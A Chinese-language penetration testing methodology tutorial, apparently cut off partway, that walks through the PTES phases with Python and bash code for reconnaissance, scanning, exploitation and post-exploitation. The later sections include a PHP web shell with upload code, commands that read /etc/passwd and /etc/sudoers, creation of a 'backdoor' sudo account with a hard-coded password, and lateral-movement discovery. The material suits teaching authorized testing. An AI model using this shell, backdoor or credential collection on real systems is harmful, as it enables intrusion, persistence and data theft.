渗透测试方法论
渗透测试是一种通过模拟恶意攻击者的行为来评估系统安全性的方法。本文将详细介绍渗透测试的方法论、流程、工具和最佳实践。
渗透测试概述
什么是渗透测试
渗透测试(Penetration Testing,简称Pentest)是一种授权的模拟网络攻击,用于评估系统的安全性。通过模拟真实攻击者的行为,发现系统中的安全漏洞和弱点。
渗透测试的目标
- 发现安全漏洞:识别系统中的安全弱点
- 评估风险影响:评估漏洞被利用的潜在影响
- 验证安全控制:测试现有安全措施的有效性
- 提供修复建议:为发现的问题提供解决方案
- 合规要求:满足法规和标准的要求
渗透测试类型
按测试范围分类
- 网络渗透测试:测试网络基础设施
- Web应用渗透测试:测试Web应用程序
- 移动应用渗透测试:测试移动应用
- 无线网络渗透测试:测试无线网络安全
- 社会工程测试:测试人员安全意识
- 物理安全测试:测试物理访问控制
按测试方法分类
- 黑盒测试:测试者不了解系统内部结构
- 白盒测试:测试者完全了解系统内部结构
- 灰盒测试:测试者部分了解系统结构
渗透测试方法论框架
PTES(Penetration Testing Execution Standard)
PTES是业界广泛认可的渗透测试执行标准,共包含七个阶段。下文依次介绍前六个阶段,第七阶段“报告”(Reporting)见后文“渗透测试报告”一节:
1. 前期交互(Pre-engagement Interactions)
# 渗透测试项目管理模板
class PenetrationTestProject:
    """Engagement metadata agreed with the client before testing starts.

    ``project_info`` holds administrative details and ``scope_definition``
    holds what may and may not be tested. Both start empty and are filled
    in by the caller.
    """

    def __init__(self):
        self.project_info = dict(
            client_name='',
            project_scope=[],
            test_type='',  # black-box, white-box, gray-box
            start_date='',
            end_date='',
            authorized_personnel=[],
            emergency_contacts=[],
            rules_of_engagement=[],
        )
        self.scope_definition = dict(
            in_scope_assets=[],
            out_of_scope_assets=[],
            testing_windows=[],
            restrictions=[],
            success_criteria=[],
        )

    def create_statement_of_work(self):
        """Return the statement of work as a Markdown string."""

        def bullets(items):
            # One "- item" line per entry; an empty list yields an empty line.
            return "\n".join(f"- {item}" for item in items)

        info = self.project_info
        scope = self.scope_definition
        lines = [
            "",
            "# 渗透测试工作说明书",
            "## 项目概述",
            f"- 客户:{info['client_name']}",
            f"- 测试类型:{info['test_type']}",
            f"- 测试时间:{info['start_date']} 至 {info['end_date']}",
            "## 测试范围",
            "### 包含范围",
            bullets(scope['in_scope_assets']),
            "### 排除范围",
            bullets(scope['out_of_scope_assets']),
            "## 测试限制",
            bullets(scope['restrictions']),
            "## 交付成果",
            "- 渗透测试报告",
            "- 漏洞详细说明",
            "- 修复建议",
            "- 执行摘要",
            "",
        ]
        return "\n".join(lines)

    def generate_rules_of_engagement(self):
        """Return the default rules of engagement as a dict of string lists."""
        allowed = [
            'Network scanning',
            'Vulnerability assessment',
            'Web application testing',
            'Social engineering (if approved)',
        ]
        forbidden = [
            'Denial of Service attacks',
            'Data destruction or modification',
            'Physical breaking and entering',
            'Testing during business hours (unless approved)',
        ]
        escalation = [
            'Immediate notification for critical findings',
            'Daily status updates',
            'Emergency contact procedures',
        ]
        return {
            'authorized_testing_methods': allowed,
            'prohibited_activities': forbidden,
            'escalation_procedures': escalation,
        }
2. 情报收集(Intelligence Gathering)
# 信息收集自动化工具
import subprocess
import requests
import dns.resolver
import whois
from bs4 import BeautifulSoup
import json
class IntelligenceGathering:
    """Collect reconnaissance data about a target domain.

    Results accumulate in ``gathered_info``, a dict of lists (plus the
    ``domain_info`` dict). Each value is recorded at most once.

    Relies on the module-level imports ``requests``, ``dns.resolver``,
    ``whois`` and ``BeautifulSoup``. Only use against targets covered by a
    written authorization.
    """

    # (substring searched for in a script URL, label recorded); the first
    # matching marker wins for each script tag.
    JS_FRAMEWORK_MARKERS = (
        ('jquery', "JavaScript: jQuery"),
        ('angular', "JavaScript: Angular"),
        ('react', "JavaScript: React"),
    )

    def __init__(self, target_domain):
        self.target = target_domain
        self.gathered_info = {
            'domain_info': {},
            'subdomains': [],
            'ip_addresses': [],
            'technologies': [],
            'employees': [],
            'email_addresses': [],
            'social_media': []
        }

    def _record(self, key, value):
        """Append ``value`` to ``gathered_info[key]`` unless already present."""
        bucket = self.gathered_info[key]
        if value not in bucket:
            bucket.append(value)

    def passive_reconnaissance(self):
        """Run the WHOIS, DNS, search-engine and social-media steps.

        Returns:
            The ``gathered_info`` dict (the same object, not a copy).
        """
        print(f"Starting passive reconnaissance for {self.target}")
        self.whois_lookup()
        self.dns_enumeration()
        self.search_engine_reconnaissance()
        self.social_media_reconnaissance()
        return self.gathered_info

    def whois_lookup(self):
        """Store registrar, dates, name servers and emails from WHOIS."""
        try:
            domain_info = whois.whois(self.target)
            self.gathered_info['domain_info'] = {
                'registrar': domain_info.registrar,
                'creation_date': str(domain_info.creation_date),
                'expiration_date': str(domain_info.expiration_date),
                'name_servers': domain_info.name_servers,
                'emails': domain_info.emails
            }
        except Exception as e:
            print(f"WHOIS lookup failed: {e}")

    def dns_enumeration(self):
        """Query common record types; record A addresses and MX hosts."""
        record_types = ['A', 'AAAA', 'MX', 'NS', 'TXT', 'CNAME']
        for record_type in record_types:
            try:
                answers = dns.resolver.resolve(self.target, record_type)
            except Exception:
                # Best effort: a record type that does not exist or a
                # resolver timeout must not stop the remaining queries.
                continue
            for answer in answers:
                if record_type == 'A':
                    self._record('ip_addresses', str(answer))
                elif record_type == 'MX':
                    # MX text is "<preference> <host>."; keep the host
                    # without the trailing root dot.
                    host = str(answer).split()[-1].rstrip('.')
                    self._record('subdomains', host)

    def subdomain_enumeration(self):
        """Resolve a short list of common subdomain names."""
        common_subdomains = [
            'www', 'mail', 'ftp', 'admin', 'test', 'dev', 'staging',
            'api', 'blog', 'shop', 'support', 'portal', 'vpn'
        ]
        for subdomain in common_subdomains:
            full_domain = f"{subdomain}.{self.target}"
            try:
                answers = dns.resolver.resolve(full_domain, 'A')
            except Exception:
                # Most guesses will not resolve; that is expected.
                continue
            self._record('subdomains', full_domain)
            for answer in answers:
                self._record('ip_addresses', str(answer))

    def search_engine_reconnaissance(self):
        """Print search queries for the tester to run by hand."""
        google_dorks = [
            f'site:{self.target}',
            f'site:{self.target} filetype:pdf',
            f'site:{self.target} inurl:admin',
            f'site:{self.target} intitle:"index of"',
            f'"{self.target}" email'
        ]
        # Not automated: search engines rate-limit and block scripted queries.
        print("Google Dorks to manually check:")
        for dork in google_dorks:
            print(f"  - {dork}")

    def social_media_reconnaissance(self):
        """Placeholder for social-media research; collects nothing.

        ``passive_reconnaissance`` calls this step, but the original code
        never defined it, so the call raised AttributeError. This step is
        not automated here; subclasses may override it and fill
        ``gathered_info['social_media']``.
        """
        print("Social media reconnaissance is not automated; review manually.")

    def technology_fingerprinting(self, url):
        """Record server, framework and CMS hints found at ``url``."""
        try:
            response = requests.get(url, timeout=10)
            headers = response.headers
            if 'Server' in headers:
                self._record('technologies', f"Server: {headers['Server']}")
            if 'X-Powered-By' in headers:
                self._record('technologies', f"Powered by: {headers['X-Powered-By']}")

            soup = BeautifulSoup(response.content, 'html.parser')

            # A generator meta tag without a content attribute must not
            # abort the rest of the analysis.
            generator_tag = soup.find('meta', {'name': 'generator'})
            generator = generator_tag.get('content') if generator_tag else None
            if generator:
                self._record('technologies', f"CMS: {generator}")

            for script in soup.find_all('script', src=True):
                src = script['src'].lower()
                for marker, label in self.JS_FRAMEWORK_MARKERS:
                    if marker in src:
                        self._record('technologies', label)
                        break
        except Exception as e:
            print(f"Technology fingerprinting failed: {e}")
3. 威胁建模(Threat Modeling)
# 威胁建模框架
class ThreatModeling:
    """Build a simple threat model for a target system.

    The model consists of assets, threats, attack vectors and an attack
    tree. The asset and threat catalogues are fixed templates; ratings
    come from the ``assess_*`` hooks.
    """

    # Rating returned by the default assess_* hooks. The original code
    # called these hooks without defining them (AttributeError); subclasses
    # should override them with real scoring.
    UNASSESSED = 'unassessed'

    def __init__(self, target_system):
        self.target = target_system
        self.assets = []
        self.threats = []
        self.vulnerabilities = []
        self.attack_vectors = []

    def assess_asset_criticality(self, asset_name):
        """Return a criticality rating for ``asset_name`` (default: unassessed)."""
        return self.UNASSESSED

    def assess_asset_value(self, asset_name):
        """Return a value rating for ``asset_name`` (default: unassessed)."""
        return self.UNASSESSED

    def assess_threat_likelihood(self, threat_type):
        """Return a likelihood rating for ``threat_type`` (default: unassessed)."""
        return self.UNASSESSED

    def identify_assets(self):
        """Rebuild and return ``self.assets`` from the asset catalogue.

        The list is rebuilt on every call, so repeated calls do not
        accumulate duplicate entries.
        """
        asset_categories = {
            'data': ['customer_data', 'financial_records', 'intellectual_property'],
            'systems': ['web_servers', 'databases', 'network_devices'],
            'applications': ['web_apps', 'mobile_apps', 'desktop_apps'],
            'infrastructure': ['networks', 'cloud_services', 'physical_facilities']
        }
        self.assets = [
            {
                'name': item,
                'category': category,
                'criticality': self.assess_asset_criticality(item),
                'value': self.assess_asset_value(item),
            }
            for category, items in asset_categories.items()
            for item in items
        ]
        return self.assets

    def identify_threats(self):
        """Rebuild and return ``self.threats`` from the threat catalogue."""
        threat_categories = {
            'external_attackers': {
                'description': 'External malicious actors',
                'capabilities': ['network_attacks', 'web_attacks', 'social_engineering'],
                'motivations': ['financial_gain', 'data_theft', 'reputation_damage']
            },
            'internal_threats': {
                'description': 'Malicious or negligent insiders',
                'capabilities': ['privileged_access', 'data_access', 'system_knowledge'],
                'motivations': ['financial_gain', 'revenge', 'negligence']
            },
            'nation_state': {
                'description': 'State-sponsored attackers',
                'capabilities': ['advanced_techniques', 'zero_day_exploits', 'persistent_access'],
                'motivations': ['espionage', 'sabotage', 'intelligence_gathering']
            }
        }
        self.threats = [
            {
                'type': threat_type,
                'description': details['description'],
                'capabilities': details['capabilities'],
                'motivations': details['motivations'],
                'likelihood': self.assess_threat_likelihood(threat_type),
            }
            for threat_type, details in threat_categories.items()
        ]
        return self.threats

    def map_attack_vectors(self):
        """Store and return the catalogue of attack vectors."""
        attack_vectors = [
            {
                'name': 'Web Application Attacks',
                'techniques': ['SQL Injection', 'XSS', 'CSRF', 'Authentication Bypass'],
                'entry_points': ['login_forms', 'search_functions', 'file_uploads'],
                'impact': 'high'
            },
            {
                'name': 'Network Attacks',
                'techniques': ['Port Scanning', 'Service Exploitation', 'Man-in-the-Middle'],
                'entry_points': ['open_ports', 'network_services', 'wireless_networks'],
                'impact': 'medium'
            },
            {
                'name': 'Social Engineering',
                'techniques': ['Phishing', 'Pretexting', 'Physical Access'],
                'entry_points': ['email', 'phone', 'physical_locations'],
                'impact': 'high'
            }
        ]
        self.attack_vectors = attack_vectors
        return attack_vectors

    def create_attack_trees(self):
        """Return a four-stage attack tree (not stored on the instance)."""
        attack_tree = {
            'goal': 'Compromise Target System',
            'sub_goals': [
                {
                    'name': 'Gain Initial Access',
                    'methods': [
                        'Exploit Web Vulnerability',
                        'Phishing Attack',
                        'Brute Force Authentication'
                    ]
                },
                {
                    'name': 'Escalate Privileges',
                    'methods': [
                        'Local Privilege Escalation',
                        'Credential Harvesting',
                        'Exploit Misconfiguration'
                    ]
                },
                {
                    'name': 'Maintain Persistence',
                    'methods': [
                        'Install Backdoor',
                        'Create Rogue Account',
                        'Modify System Files'
                    ]
                },
                {
                    'name': 'Achieve Objective',
                    'methods': [
                        'Data Exfiltration',
                        'System Disruption',
                        'Lateral Movement'
                    ]
                }
            ]
        }
        return attack_tree
4. 漏洞分析(Vulnerability Analysis)
# 漏洞扫描和分析工具
import nmap
import requests
from urllib.parse import urljoin, urlparse
import ssl
import socket
class VulnerabilityAnalysis:
    """Scan authorized targets for network and web vulnerabilities.

    Relies on the module-level imports ``nmap``, ``requests``, ``ssl``,
    ``socket``, ``urljoin`` and ``urlparse``. Findings are plain dicts
    with at least ``type``, ``severity`` and ``url`` keys.
    """

    # Error-based detection payloads. A destructive statement
    # ("DROP TABLE") was removed: a detection scan must never be able to
    # modify or destroy data on the system under test.
    SQL_PAYLOADS = (
        "'",
        "' OR '1'='1",
        "' OR '1'='1' --",
        "' OR '1'='1' /*",
        "1' UNION SELECT NULL,NULL,NULL--",
    )

    XSS_PAYLOADS = (
        '<script>alert("XSS")</script>',
        '<img src=x onerror=alert("XSS")>',
        '<svg onload=alert("XSS")>',
        'javascript:alert("XSS")',
        '"><script>alert("XSS")</script>',
    )

    # Database error fragments that indicate an unhandled SQL error.
    SQL_ERROR_PATTERNS = (
        'mysql_fetch_array',
        'ORA-01756',
        'Microsoft OLE DB Provider',
        'SQLServer JDBC Driver',
        'PostgreSQL query failed',
        'sqlite3.OperationalError',
    )

    TEXT_INPUT_TYPES = ('text', 'search', 'email')
    HTTP_TIMEOUT = 10  # seconds, applied to every HTTP and TLS connection

    def __init__(self, targets):
        self.targets = targets if isinstance(targets, list) else [targets]
        self.vulnerabilities = []
        self.scan_results = {}

    # ------------------------------------------------------------------
    # Extension hooks. The original code called these three methods
    # without defining them, so every scan raised AttributeError. The
    # defaults report nothing; subclasses supply the real checks.
    # ------------------------------------------------------------------
    def check_service_vulnerabilities(self, service_info):
        """Return known vulnerabilities for a service (default: none)."""
        return []

    def test_directory_traversal(self, base_url):
        """Return directory-traversal findings for ``base_url`` (default: none)."""
        return []

    def test_xss_payload(self, url, param, payload, method):
        """Return a finding dict if ``payload`` is exploitable, else None.

        The default performs no request and returns None.
        """
        return None

    def network_vulnerability_scan(self):
        """Port-scan every target with nmap and collect per-host results.

        Returns:
            ``self.scan_results``, keyed by host address.
        """
        nm = nmap.PortScanner()
        for target in self.targets:
            print(f"Scanning {target}...")
            nm.scan(target, '1-65535', '-sS -sV -O --script vuln')
            for host in nm.all_hosts():
                host_info = {
                    'host': host,
                    'state': nm[host].state(),
                    'protocols': [],
                    'vulnerabilities': []
                }
                for protocol in nm[host].all_protocols():
                    for port, port_info in nm[host][protocol].items():
                        service_info = {
                            'port': port,
                            'state': port_info['state'],
                            'name': port_info['name'],
                            'version': port_info.get('version', ''),
                            'product': port_info.get('product', '')
                        }
                        vulns = self.check_service_vulnerabilities(service_info)
                        host_info['vulnerabilities'].extend(vulns)
                        host_info['protocols'].append(service_info)
                self.scan_results[host] = host_info
        return self.scan_results

    def web_vulnerability_scan(self, base_url):
        """Run the SQL injection, XSS, traversal and TLS checks in order."""
        web_vulns = []
        web_vulns.extend(self.test_sql_injection(base_url))
        web_vulns.extend(self.test_xss(base_url))
        web_vulns.extend(self.test_directory_traversal(base_url))
        web_vulns.extend(self.test_ssl_configuration(base_url))
        return web_vulns

    def _iter_form_fields(self, base_url):
        """Yield ``(target_url, field_name, method)`` for each testable input.

        Only named free-text inputs are yielded. An input without a
        ``type`` attribute counts as text, which is the HTML default.
        """
        from bs4 import BeautifulSoup
        response = requests.get(base_url, timeout=self.HTTP_TIMEOUT)
        soup = BeautifulSoup(response.content, 'html.parser')
        for form in soup.find_all('form'):
            method = form.get('method', 'get').lower()
            target_url = urljoin(base_url, form.get('action', ''))
            for input_field in form.find_all('input'):
                if input_field.get('type', 'text').lower() not in self.TEXT_INPUT_TYPES:
                    continue
                field_name = input_field.get('name', '')
                if not field_name:
                    # A nameless input is never submitted by a browser.
                    continue
                yield target_url, field_name, method

    def _probe_fields(self, base_url, payloads, probe):
        """Try ``payloads`` on every form field; keep the first hit per field."""
        findings = []
        for target_url, field_name, method in self._iter_form_fields(base_url):
            for payload in payloads:
                vuln = probe(target_url, field_name, payload, method)
                if vuln:
                    findings.append(vuln)
                    break  # one confirmed payload per field is enough
        return findings

    def test_sql_injection(self, base_url):
        """Probe each form field on ``base_url`` for error-based SQL injection."""
        try:
            return self._probe_fields(base_url, self.SQL_PAYLOADS, self.test_sql_payload)
        except Exception as e:
            print(f"SQL injection test failed: {e}")
            return []

    def test_sql_payload(self, url, param, payload, method):
        """Submit one payload; return a finding if a SQL error is echoed back."""
        try:
            if method == 'post':
                response = requests.post(url, data={param: payload}, timeout=self.HTTP_TIMEOUT)
            else:
                response = requests.get(url, params={param: payload}, timeout=self.HTTP_TIMEOUT)
        except requests.RequestException:
            # An unreachable endpoint is not evidence of a vulnerability.
            return None
        body = response.text.lower()
        for pattern in self.SQL_ERROR_PATTERNS:
            if pattern.lower() in body:
                return {
                    'type': 'SQL Injection',
                    'severity': 'High',
                    'url': url,
                    'parameter': param,
                    'payload': payload,
                    'evidence': pattern
                }
        return None

    def test_xss(self, base_url):
        """Probe each form field on ``base_url`` via ``test_xss_payload``."""
        try:
            return self._probe_fields(base_url, self.XSS_PAYLOADS, self.test_xss_payload)
        except Exception as e:
            print(f"XSS test failed: {e}")
            return []

    def test_ssl_configuration(self, url):
        """Check the TLS certificate and negotiated cipher of an https URL.

        The default SSL context verifies the certificate during the
        handshake, so an expired or otherwise invalid certificate shows up
        as ``ssl.SSLCertVerificationError``. The original inspected
        ``notAfter`` only after a successful handshake, so its expiry
        branch could never run. Non-https URLs yield no findings.
        """
        vulnerabilities = []
        try:
            parsed_url = urlparse(url)
            if parsed_url.scheme != 'https':
                return vulnerabilities
            hostname = parsed_url.hostname
            port = parsed_url.port or 443
            context = ssl.create_default_context()
            with socket.create_connection((hostname, port), timeout=self.HTTP_TIMEOUT) as sock:
                with context.wrap_socket(sock, server_hostname=hostname) as ssock:
                    cipher = ssock.cipher()
            if cipher and 'RC4' in cipher[0]:
                vulnerabilities.append({
                    'type': 'Weak SSL Cipher',
                    'severity': 'Medium',
                    'url': url,
                    'details': f'Weak cipher: {cipher[0]}'
                })
        except ssl.SSLCertVerificationError as e:
            # Verify code 10 is OpenSSL's X509_V_ERR_CERT_HAS_EXPIRED.
            expired = e.verify_code == 10
            vulnerabilities.append({
                'type': 'Expired SSL Certificate' if expired else 'Invalid SSL Certificate',
                'severity': 'High',
                'url': url,
                'details': e.verify_message
            })
        except Exception as e:
            print(f"SSL test failed: {e}")
        return vulnerabilities
5. 漏洞利用(Exploitation)
# 漏洞利用框架
class ExploitationFramework:
"""Record the outcome of exploitation attempts made during an authorized test.

Every method issues live requests against the target, so it must only be run
against systems named in a written authorization and within the agreed rules
of engagement.
"""
# NOTE(review): none of the requests calls in this class pass a timeout, so a
# stalled target can block an attempt indefinitely.
def __init__(self):
# exploits: one record per attempt; successful_exploits: the records whose
# status is 'successful'; shells: URLs of uploaded shells that responded.
self.exploits = []
self.successful_exploits = []
self.shells = []
def sql_injection_exploit(self, target_url, vulnerable_param):
"""Attempt a UNION-based SQL injection and return the attempt record.

The record is appended to self.exploits, and also to
self.successful_exploits when its status is 'successful'.
"""
exploit_info = {
'type': 'SQL Injection',
'target': target_url,
'parameter': vulnerable_param,
'status': 'attempting'
}
try:
# Try to read the database version
version_payload = "' UNION SELECT @@version,NULL,NULL--"
params = {vulnerable_param: version_payload}
response = requests.get(target_url, params=params)
if 'mysql' in response.text.lower():
exploit_info['database'] = 'MySQL'
# Try to read the database name
db_payload = "' UNION SELECT database(),NULL,NULL--"
params = {vulnerable_param: db_payload}
response = requests.get(target_url, params=params)
# Parse the response to obtain the database name.
# Parsing depends on the actual response format and is not implemented.
# NOTE(review): status is set to 'successful' without inspecting the second
# response, so success means only that 'mysql' appeared in the first one.
exploit_info['status'] = 'successful'
exploit_info['data_extracted'] = 'Database information'
elif 'oracle' in response.text.lower():
exploit_info['database'] = 'Oracle'
# Oracle-specific logic is not implemented; status stays 'attempting'.
except Exception as e:
exploit_info['status'] = 'failed'
exploit_info['error'] = str(e)
self.exploits.append(exploit_info)
if exploit_info['status'] == 'successful':
self.successful_exploits.append(exploit_info)
return exploit_info
def web_shell_upload(self, target_url, upload_endpoint):
"""Attempt to upload a PHP command shell and return the attempt record.

On success the shell URL is stored in the record and in self.shells.
"""
# NOTE(review): the uploaded page executes any 'cmd' value with no
# authentication, and nothing in this class removes it afterwards. Cleanup has
# to happen elsewhere before the engagement ends - TODO confirm.
shell_code = '''
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
<form method="GET">
<input type="text" name="cmd" placeholder="Enter command">
<input type="submit" value="Execute">
</form>
'''
exploit_info = {
'type': 'Web Shell Upload',
'target': target_url,
'endpoint': upload_endpoint,
'status': 'attempting'
}
try:
# Try to upload the PHP shell
files = {'file': ('shell.php', shell_code, 'application/x-php')}
response = requests.post(upload_endpoint, files=files)
if response.status_code == 200:
# Try to reach the uploaded shell
# NOTE(review): assumes the file lands at uploads/shell.php and that the web
# server runs as 'www-data'; any other layout leaves status at 'attempting'.
shell_url = urljoin(target_url, 'uploads/shell.php')
test_response = requests.get(shell_url, params={'cmd': 'whoami'})
if test_response.status_code == 200 and 'www-data' in test_response.text:
exploit_info['status'] = 'successful'
exploit_info['shell_url'] = shell_url
self.shells.append(shell_url)
else:
exploit_info['status'] = 'failed'
exploit_info['error'] = 'Shell upload failed or not accessible'
except Exception as e:
exploit_info['status'] = 'failed'
exploit_info['error'] = str(e)
self.exploits.append(exploit_info)
if exploit_info['status'] == 'successful':
self.successful_exploits.append(exploit_info)
return exploit_info
def privilege_escalation(self, shell_url):
"""Look for privilege-escalation opportunities through an existing shell.

Returns a record whose status is 'not_needed', 'possible', 'failed', or still
'attempting' when no indicator was found. The record is not added to
self.exploits.
"""
escalation_info = {
'type': 'Privilege Escalation',
'shell': shell_url,
'status': 'attempting'
}
try:
# Check the current user
response = requests.get(shell_url, params={'cmd': 'whoami'})
current_user = response.text.strip()
if 'root' in current_user:
escalation_info['status'] = 'not_needed'
escalation_info['current_user'] = current_user
return escalation_info
# Try common enumeration commands
escalation_commands = [
'sudo -l', # check sudo rights
'find / -perm -u=s -type f 2>/dev/null', # find SUID files
'crontab -l', # check scheduled jobs
'cat /etc/passwd', # list user accounts
]
for cmd in escalation_commands:
response = requests.get(shell_url, params={'cmd': cmd})
# Inspect the response for escalation indicators
if 'NOPASSWD' in response.text:
escalation_info['method'] = 'sudo_nopasswd'
escalation_info['status'] = 'possible'
break
# NOTE(review): this test is applied to the output of every command, and
# /etc/passwd output presumably contains both '/bin/bash' and 'root', so a
# 'suid_binary' result may be a false positive - verify.
elif '/bin/bash' in response.text and 'root' in response.text:
escalation_info['method'] = 'suid_binary'
escalation_info['status'] = 'possible'
break
except Exception as e:
escalation_info['status'] = 'failed'
escalation_info['error'] = str(e)
return escalation_info
6. 后渗透(Post Exploitation)
# 后渗透活动框架
class PostExploitation:
"""Record post-exploitation activity carried out through a web shell URL.

Every method changes or reads a live system, so it must only be used on
systems named in a written authorization. All accounts and artifacts it
creates must be removed and reported at the end of the engagement.
"""
def __init__(self, compromised_systems):
self.systems = compromised_systems
self.collected_data = []
self.persistence_methods = []
# NOTE(review): this instance attribute has the same name as the
# lateral_movement method defined below, so on an instance the name resolves to
# this list and the method cannot be called through it.
self.lateral_movement = []
def establish_persistence(self, shell_url):
"""Try persistence techniques in order and stop at the first success.

Successful results are appended to self.persistence_methods; nothing is
returned.
"""
# NOTE(review): install_ssh_key, create_cron_job and modify_startup_script are
# not defined in the visible class. Building this list raises AttributeError
# before the try block below is reached, unless they are defined elsewhere.
persistence_methods = [
self.create_backdoor_user,
self.install_ssh_key,
self.create_cron_job,
self.modify_startup_script
]
for method in persistence_methods:
try:
result = method(shell_url)
if result['status'] == 'successful':
self.persistence_methods.append(result)
break # one successful method is enough
except Exception as e:
print(f"Persistence method failed: {e}")
def create_backdoor_user(self, shell_url):
"""Create a sudo-capable local account through the shell; return a status dict."""
# NOTE(review): the account name and password are hard-coded and weak, which
# leaves the client system exposed until the account is removed. Success is
# inferred only from the absence of 'permission denied' in the output.
commands = [
'useradd -m -s /bin/bash backdoor',
'echo "backdoor:password123" | chpasswd',
'usermod -aG sudo backdoor'
]
for cmd in commands:
response = requests.get(shell_url, params={'cmd': cmd})
if 'permission denied' in response.text.lower():
return {'status': 'failed', 'method': 'backdoor_user', 'error': 'insufficient_privileges'}
return {'status': 'successful', 'method': 'backdoor_user', 'username': 'backdoor'}
def data_collection(self, shell_url):
"""Run a fixed set of enumeration commands and return their raw output.

The output dict, keyed by information type, is also appended to
self.collected_data with a timestamp.
"""
# NOTE(review): the collected output can contain sensitive client data; store
# and handle it according to the engagement's data-protection terms.
collection_commands = {
'system_info': 'uname -a',
'network_config': 'ifconfig',
'running_processes': 'ps aux',
'installed_software': 'dpkg -l',
'user_accounts': 'cat /etc/passwd',
'sudo_config': 'cat /etc/sudoers',
'ssh_keys': 'find /home -name "*.ssh" -type d',
'database_files': 'find / -name "*.db" -o -name "*.sql" 2>/dev/null',
'config_files': 'find /etc -name "*.conf" 2>/dev/null | head -20'
}
collected_info = {}
for info_type, command in collection_commands.items():
try:
response = requests.get(shell_url, params={'cmd': command})
collected_info[info_type] = response.text
except Exception as e:
collected_info[info_type] = f"Collection failed: {e}"
# NOTE(review): 'datetime' is not imported in this section; the call below
# needs 'from datetime import datetime' in scope - TODO confirm.
self.collected_data.append({
'system': shell_url,
'timestamp': datetime.now().isoformat(),
'data': collected_info
})
return collected_info
def lateral_movement(self, shell_url):
"""Discover neighbouring hosts through the shell and try to reach up to five."""
movement_info = {
'source': shell_url,
'targets': [],
'successful_moves': []
}
# Discover other hosts on the network
# NOTE(review): the 192.168.1.0/24 range is hard-coded and the discovered
# addresses are not checked against the engagement scope before being used.
network_discovery_commands = [
'arp -a',
'netstat -rn',
'nmap -sn 192.168.1.0/24'
]
discovered_hosts = []
for cmd in network_discovery_commands:
try:
response = requests.get(shell_url, params={'cmd': cmd})
# Extract IP addresses from the response
import re
# The pattern matches any dotted quad, so netmasks and gateway entries in the
# command output are collected as well.
ip_pattern = r'\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b'
ips = re.findall(ip_pattern, response.text)
discovered_hosts.extend(ips)
except:
continue
# Remove duplicates (set() does not preserve discovery order)
discovered_hosts = list(set(discovered_hosts))
movement_info['targets'] = discovered_hosts
# Attempt lateral movement
for target_ip in discovered_hosts[:5]: # cap the number of attempts
move_result = self.attempt_lateral_move(shell_url, target_ip)
if move_result['status'] == 'successful':
movement_info['successful_moves'].append(move_result)
self.lateral_movement.append(movement_info)
return movement_info
def attempt_lateral_move(self, shell_url, target_ip):
"""Try each movement technique against target_ip; return the first success."""
# NOTE(review): ssh_key_reuse, credential_reuse and exploit_service are not
# defined in the visible class. Building this list raises AttributeError
# outside the try block below, unless they are defined elsewhere.
move_methods = [
self.ssh_key_reuse,
self.credential_reuse,
self.exploit_service
]
for method in move_methods:
try:
result = method(shell_url, target_ip)
if result['status'] == 'successful':
return result
except:
continue
return {'status': 'failed', 'target': target_ip}
def generate_post_exploitation_report(self):
"""Return a dict summarising the recorded activity plus remediation advice."""
report = {
'summary': {
'compromised_systems': len(self.systems),
'persistence_established': len(self.persistence_methods),
'data_collected': len(self.collected_data),
'lateral_movement_attempts': len(self.lateral_movement)
},
'persistence_methods': self.persistence_methods,
'collected_data': self.collected_data,
'lateral_movement': self.lateral_movement,
'recommendations': self.generate_remediation_recommendations()
}
return report
def generate_remediation_recommendations(self):
"""Return a fixed list of general remediation recommendations."""
recommendations = [
'Patch all identified vulnerabilities immediately',
'Implement network segmentation to prevent lateral movement',
'Deploy endpoint detection and response (EDR) solutions',
'Conduct regular security awareness training',
'Implement multi-factor authentication',
'Regular security assessments and penetration testing'
]
return recommendations
渗透测试工具
网络扫描工具
#!/bin/bash
# Network scanning script.
#
# Runs a series of nmap scans against one authorized target and writes all
# results into a timestamped output directory.
#
# Usage: ./scan.sh <target_ip_or_range>
TARGET=$1
OUTPUT_DIR="pentest_results_$(date +%Y%m%d_%H%M%S)"
if [ -z "$TARGET" ]; then
    echo "Usage: $0 <target_ip_or_range>"
    exit 1
fi
# All expansions are quoted so unusual characters cannot split or glob.
mkdir -p "$OUTPUT_DIR" || exit 1
echo "[+] Starting network reconnaissance for $TARGET"
# Default-port scan with version, OS and vulnerability scripts
echo "[+] Running Nmap scans..."
nmap -sS -sV -O -A --script vuln "$TARGET" -oA "$OUTPUT_DIR/nmap_scan"
# Full TCP port scan
echo "[+] Running detailed port scan..."
nmap -p- --min-rate 1000 "$TARGET" -oA "$OUTPUT_DIR/full_port_scan"
# UDP scan
echo "[+] Running UDP scan..."
nmap -sU --top-ports 1000 "$TARGET" -oA "$OUTPUT_DIR/udp_scan"
# Service enumeration
echo "[+] Running service enumeration..."
# Reuse the open ports found by the full port scan instead of scanning all
# 65535 ports a second time. The grepable output lists them as
# "<port>/open/tcp".
OPEN_PORTS=$(grep -oE '[0-9]+/open/tcp' "$OUTPUT_DIR/full_port_scan.gnmap" 2>/dev/null \
    | cut -d '/' -f 1 | sort -un | paste -sd, -)
if [ -n "$OPEN_PORTS" ]; then
    nmap -sC -sV -p "$OPEN_PORTS" "$TARGET" -oA "$OUTPUT_DIR/service_enum"
else
    # With an empty list, "-p" would consume the target as its argument.
    echo "[-] No open TCP ports found; skipping service enumeration"
fi
echo "[+] Network scanning completed. Results saved in $OUTPUT_DIR"
Web应用测试工具
# Web应用安全测试工具
import requests
from urllib.parse import urljoin, urlparse
from bs4 import BeautifulSoup
import threading
import time
class WebApplicationTester:
    """Crawl an authorized web application and collect findings.

    Relies on the module-level imports ``requests``, ``urljoin``,
    ``urlparse``, ``BeautifulSoup`` and ``time``.
    """

    def __init__(self, target_url):
        self.target = target_url
        self.session = requests.Session()
        self.found_urls = set()
        self.vulnerabilities = []
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
        })

    def _same_site_url(self, base_url, href):
        """Resolve ``href`` against ``base_url``; return None if off-site.

        The fragment is dropped so ``/page#a`` and ``/page#b`` are crawled
        once.
        """
        from urllib.parse import urldefrag
        full_url = urldefrag(urljoin(base_url, href)).url
        if urlparse(full_url).netloc != urlparse(self.target).netloc:
            return None
        return full_url

    def crawl_website(self, max_depth=3):
        """Breadth-first crawl of same-host links up to ``max_depth``.

        Each URL is requested at most once. Forms found on HTML pages are
